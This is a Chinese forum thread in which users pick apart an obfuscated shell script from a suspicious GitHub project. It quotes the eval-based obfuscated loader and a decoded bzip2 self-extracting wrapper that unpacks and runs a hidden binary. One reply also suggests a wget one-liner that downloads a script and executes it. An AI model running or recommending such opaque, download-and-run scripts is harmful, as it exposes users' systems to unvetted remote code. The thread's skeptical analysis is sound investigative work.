执行了一个 shell 脚本，被吓了一跳

defunct9

47 天前

https://ygkkk.blogspot.com/2022/06/github.html

Moyyyyyyyyyyye

47 天前

可能是提供这个服务，但是不想让你修改，类似闭源软件吧

proxytoworld

47 天前

https://hybrid-analysis.com/sample/22dde9c5c37e67cb67525dd7391ce651bcaefd3dff55bbdf8c04b8b0f69c4ffa?environmentId=100

DosLee

47 天前

最一开始的脚本内容（因为太长，删除了一部分）

```shell
z="
";IeCz='MTBi';Qz='Cllt';oQCz='RlZH';htz='cFVs';mBCz='STBW';XYz='SlVV';qgBz='a01r';BKBz='bUpY';JYBz='VWRY';ISz='aGtS';vPCz='UFYw';qcBz='a1ZW';iIBz='aERh';enBz='blpX';hDz='dFJr';RiBz='b2FR';Vz='aGlZ';WBBz='dFdN';eJCz='Mk5z';eICz='VlRJ';IWBz='VTJO';RfBz='RVZX';kOCz='R2Ez';Cmz='MjVT';WLCz='WlNX';WOz='VjAx';lQBz='aGti';
eval "$Az$Bz$Cz$Dz$Ez$Fz$Gz$z$Hz$Iz$Jz$Kz$Lz$Mz$Nz$Oz$Pz$Qz$Rz$Sz$Tz$Uz$Vz$Wz$Xz$Yz$Zz$z$az$bz$cz$dz$ez$fz$gz$hz$iz$jz$kz$lz$mz$nz$oz$pz$qz$rz$sz$z$tz$uz$vz$wz$xz$yz$ABz$BBz$CBz$DBz$EBz$FBz$GBz$HBz$IBz$JBz$KBz$LBz"
```

DosLee

47 天前

嵌套 Base64 解码后的脚本

```shell
#!/bin/bash
#
# Encrypted by Rangga Fajar Oktariansyah (Anak Gabut Thea)
#
# This file has been encrypted with BZip2 Shell Exec <https://github.com/FajarKim/bz2-shell>
# The filename '2endip.sh' encrypted at Fri Jan 19 07:09:45 UTC 2024
# I try invoking the compressed executable with the original name
# (for programs looking at their name). We also try to retain the original
# file permissions on the compressed file. For safety reasons, bzsh will
# not create setuid or setgid shell scripts.
#
# WARNING: the first line of this file must be either : or #!/bin/bash
# The : is required for some old versions of csh.
# On Ultrix, /bin/bash is too buggy, change the first line to: #!/bin/bash5
#
# Don't forget to follow me on <https://github.com/FajarKim>
skip=75

tab=' '
nl='
'
IFS=" $tab$nl"

# Make sure important variables exist if not already defined
# $USER is defined by login(1) which is not always executed (e.g. containers)
# POSIX: https://pubs.opengroup.org/onlinepubs/009695299/utilities/id.html
USER=${USER:-$(id -u -n)}
# $HOME is defined at the time of login, but it could be unset. If it is unset,
# a tilde by itself (~) will not be expanded to the current user's home directory.
# POSIX: https://pubs.opengroup.org/onlinepubs/009696899/basedefs/xbd_chap08.html#tag_08_03
HOME="${HOME:-$(getent passwd $USER 2>/dev/null | cut -d: -f6)}"
# macOS does not have getent, but this works even if $HOME is unset
HOME="${HOME:-$(eval echo ~$USER)}"
umask=`umask`
umask 77

bztmpdir=
trap 'res=$?
test -n "$bztmpdir" && rm -fr "$bztmpdir"
(exit $res); exit $res
' 0 1 2 3 5 10 13 15

case $TMPDIR in
/ | */tmp/) test -d "$TMPDIR" && test -w "$TMPDIR" && test -x "$TMPDIR" || TMPDIR=$HOME/.cache/; test -d "$HOME/.cache" && test -w "$HOME/.cache" && test -x "$HOME/.cache" || mkdir "$HOME/.cache";;
*/tmp) TMPDIR=$TMPDIR/; test -d "$TMPDIR" && test -w "$TMPDIR" && test -x "$TMPDIR" || TMPDIR=$HOME/.cache/; test -d "$HOME/.cache" && test -w "$HOME/.cache" && test -x "$HOME/.cache" || mkdir "$HOME/.cache";;
*:* | *) TMPDIR=$HOME/.cache/; test -d "$HOME/.cache" && test -w "$HOME/.cache" && test -x "$HOME/.cache" || mkdir "$HOME/.cache";;
esac
if type mktemp >/dev/null 2>&1; then
bztmpdir=`mktemp -d "${TMPDIR}bztmpXXXXXXXXX"`
else
bztmpdir=${TMPDIR}bztmp$$; mkdir $bztmpdir
fi || { (exit 127); exit 127; }

bztmp=$bztmpdir/$0
case $0 in
-* | */*'
') mkdir -p "$bztmp" && rm -r "$bztmp";;
*/*) bztmp=$bztmpdir/`basename "$0"`;;
esac || { (exit 127); exit 127; }

case `printf 'X\n' | tail -n +1 2>/dev/null` in
X) tail_n=-n;;
*) tail_n=;;
esac
if tail $tail_n +$skip <"$0" | bzip2 -cd > "$bztmp"; then
umask $umask
chmod 700 "$bztmp"
(sleep 5; rm -fr "$bztmpdir") 2>/dev/null &
"$bztmp" ${1+"$@"}; res=$?
else
printf >&2 '%s\n' "Cannot decompress ${0##*/}"
printf >&2 '%s\n' "Report bugs to <fajarrkim@gmail.com>."
(exit 127); res=127
fi; exit $res
BZh91AY&SYX�� _�D0��m�߮��w��[�m�� ) #I�=S �h~��M4�J z��h�=@
6� ��2 �d�Hi�҈0 L ��0 ` ɂd� ��LF � �& � �0L� ��C � 0 C � � & � 211 ` �( �h�&h&T�)��h� HѽS E<�M2`C� ��.B�EB�UUUUUUUUTIHT* HU!JB�B��9�݇�%B�� R��-��y�ӹ��dڻ��X��:*2�su�L��o�>�},ڱv��6| e�9 �kխ� �_� ��X�h��hՖ|=��'��~K��R��i4�̀� Yв #eɫ�� (� �OZ�Y�ȳ��y hmCƆ��m~�ߥ��#��F��X��ԑyK ��s#4V��0��c2�%�Y�� k��~�/1$C"� j��~��P� W�.��[i!%k�#ˤw{� -�� oh�� ;9d/* a
G�I2�e-N_,,�E gI: N�ž�t� �*J��; �&T�!`5��}��6 �� n��7��M� ��e��> χ0�0��hʗ&�Է�^%� T^H�i�R��! � ��|� FQ A�� p p��px��
KRRey(p]�+ P;��k��{�yFl� q|�� >3ݹX�Izu/R�T��/M]'v� �᭡��k�ի�cj��0l��> ��'��i�UG� �E '^�:�v '�T�l�"�P��Z��(DCre� }� QQ� DD2�
�#ě*�� Eǽ�+{��H�t7P��S� �!j s�a̅=�v-��z3��; d[��/_�+А��\�˭J��̅��zLq�A"�Ƨ��ۘ�Ҳ"��q�
�Q�v KK'� Tdo�ކ$[�#=G�"fE�5��N�&Q8w�Us,��&[q�l4k� DL0C �7x�^� 3�7�6Frw۱�oH��"կu#M�Z��c|��x��v��* ��n�و� :�e4!��LV,�oW��pesr��l�LZ�Qc��p8
g1%�%�]I� ��,B� N"-B�e$֋20��8�䋚�-�6� ��Eσ5ضMeFrJ��1��O=��
��K��Ng K�piX�I�% �Mc2�6��b�v�u�]r� � `mY�ʫ �b� �� dѷe��47�hX�Dҭ V�%��M�q�v�l�XXi�ɛ�f��q67ٗg<�W�p� �ǚ��s�� # �?��a� o��v��S��@!|%q �ƨ�Oa񰥱V�� e &��",��k cD�:��I B�.�V� �b��VU �7�hZ ��&�L0 2 ;f�Er`��hj �:%�� 1�Fl�4jk`BfUT��,� �"�`�߄XWw��V� ;�� k�L9�X1�Ŕ_��.
�.�Z� I� rE8P�X��
```

selca

47 天前

放 GitHub 假装开源的，一大堆人说他脚本有问题，肯定不是空穴来风的

DosLee

47 天前

@defunct9 原来是这样

mohumohu

47 天前

薅羊毛项目给油管营销号赚麻了，GitHub 上一个脚本没有的开源，命令都是下载 gitlab 的，这就是 3.2k star 含金量

InDom

47 天前

对脚本分析了一波，然后看着仓库底下“加密”原因，我在思考我为什么没去吃这口饭，赚这个钱呢？

我改个名叫 XX 哥，搞一些乱七八糟的东西，是不是就可以开工了？

InDom

47 天前

看完那个文章，吃瓜真爽........么？这都什么乱七八糟的？

pecsj

47 天前

这玩意没有用也有这么多人 star 么

defunct9

47 天前

个人感觉，就上面贴出来这个脚本，写的稀烂。这也配放到 github 上？果真无耻无畏

Y25tIGxpdmlk

47 天前

应该只是不想让你们看到源码，然后用某类代码混淆软件处理过而已，省的被别人抄过去，改一下就变自己的了。

至于有没有后门啥的，另说了

Y25tIGxpdmlk

47 天前

@defunct9 #12 个人认为代码最大的意义应该是实现某个功能，至于实现方法优不优美，写的好不好是其次的东西。

MineDog

47 天前

就一个 readme 文件的项目，为啥这么多 star ，大受震撼

liaoyigou

47 天前

wget -O snell.sh --no-check-certificate https://git.io/Snell.sh && chmod +x snell.sh && ./snell.sh

试试这个

Jokesy

47 天前

@defunct9 #12 ssh 哥，来个您的博客，让小弟膜拜学习一下

james122333

47 天前

bz2-shell?这个看起来就是 gzexe 指令的 bz 版本都是自解压缩用

noahlias

47 天前

智商税？

jqtmviyu

47 天前

我是用这个 3Kmfi6HP / EDtunnel , 屁事真多呀.